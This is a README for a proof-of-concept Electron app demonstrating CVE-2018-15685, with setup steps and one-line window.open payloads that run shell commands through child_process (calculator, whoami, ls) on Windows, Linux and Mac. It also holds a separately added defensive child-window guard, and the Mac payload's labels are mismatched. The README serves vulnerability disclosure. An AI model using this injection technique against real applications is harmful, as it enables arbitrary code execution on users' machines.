
electron_rce's Introduction

CVE-2018-15685 - Electron WebPreferences Remote Code Execution

This is a minimal Electron application with a POC for CVE-2018-15685.

A remote code execution vulnerability has been discovered affecting apps with the ability to open nested child windows on Electron versions (3.0.0-beta.6, 2.0.7, 1.8.7, and 1.7.15). This vulnerability has been assigned the CVE identifier CVE-2018-15685.

The project contains the following files:

  • main.js - This is the app's main process. Note that it has nodeIntegration disabled, so it should not be possible to use "process".
  • index.html - This is an example rendered page. This could be a remotely controlled URL, or a page from an application with an XSS. In this example it is a local file, but it still should not have access to Node bindings.

To Use

To clone and run this repository you'll need Git and Node.js (which comes with npm) installed on your computer. From your command line:

# Clone this repository
git clone https://github.com/rahulr311295/Electron_RCE.git
# Go into the repository
cd Electron_RCE
# Start a PHP server (it runs in the foreground, so run the remaining steps from a second terminal)
sudo php -S localhost:80
# Install dependencies
npm install
# Run the app
npm start

To Run

Windows

# Exploit Code
window.open().open('data:text/html,Code Execution <br><pre>Exploited: <pre><script>document.write(require("child_process").execSync("calc.exe"))</scr'+'ipt></pre></br></br><pre>Whoami: <pre><script>document.write(require("child_process").execSync("whoami"))</scr'+'ipt></pre></pre>');

# Which Executes Calculator and shows which user is currently logged in


Linux

# Exploit Code
window.open().open('data:text/html,Code Execution <br><pre>Exploited: <pre><script>document.write(require("child_process").execSync("ls"))</scr'+'ipt></pre></br></br><pre>Whoami: <pre><script>document.write(require("child_process").execSync("whoami"))</scr'+'ipt></pre></pre>');

# Which lists files and shows which user is currently logged in


Mac

# Exploit Code
window.open().open('data:text/html,Code Execution <br><pre>Exploited: <pre><script>document.write(require("child_process").execSync("ls"))</scr'+'ipt></pre></br></br><pre>Whoami: <pre><script>document.write(require("child_process").execSync("open /Applications/Calculator.app"))</scr'+'ipt></pre></pre>');

# Which Executes Calculator and lists files in the directory
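A defensive counterpart to the POC above, as an added example that is not code from this repository or from Electron: a main-process guard that vets every child window, including nested ones, before it is created. It relies on Electron's `web-contents-created` and `new-window` events as they exist on the versions listed above; the function names, the policy callback and `app.example.test` are hypothetical.

```javascript
// Added example (not from the repository). Function names, the policy
// callback and app.example.test are hypothetical.

// Turn off every preference that would hand Node.js to the child window.
function hardenChildOptions(options) {
  const prefs = options.webPreferences || {};
  prefs.nodeIntegration = false;
  prefs.nodeIntegrationInWorker = false;
  prefs.webviewTag = false;
  delete prefs.preload; // preload scripts run with Node access
  options.webPreferences = prefs;
  return options;
}

// `app` is Electron's app object. 'web-contents-created' fires for every
// webContents, including child windows, so the inner handler also sees the
// second .open() of a nested window.open().open(...) chain.
function installChildWindowGuard(app, isAllowedUrl) {
  app.on('web-contents-created', (_event, contents) => {
    contents.on('new-window', (event, url, _frame, _disposition, options) => {
      if (!isAllowedUrl(url)) {
        event.preventDefault(); // the window is never created
        return;
      }
      hardenChildOptions(options || {});
    });
  });
}

// Constructed policy: only the app's own HTTPS pages may open as children.
const allowOwnPages = (url) =>
  typeof url === 'string' && url.startsWith('https://app.example.test/');

// In main.js (Electron runtime only):
//   installChildWindowGuard(require('electron').app, allowOwnPages);
```

With this policy the `data:` URL used by the POC is rejected before a window exists, and any allowed child is created with Node integration forced off.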


For More Information about this Vulnerability

Full write-up on the Contrast Security blog, or the write-up on the official blog from Electron

Credits to

Matt Austin for the original POC
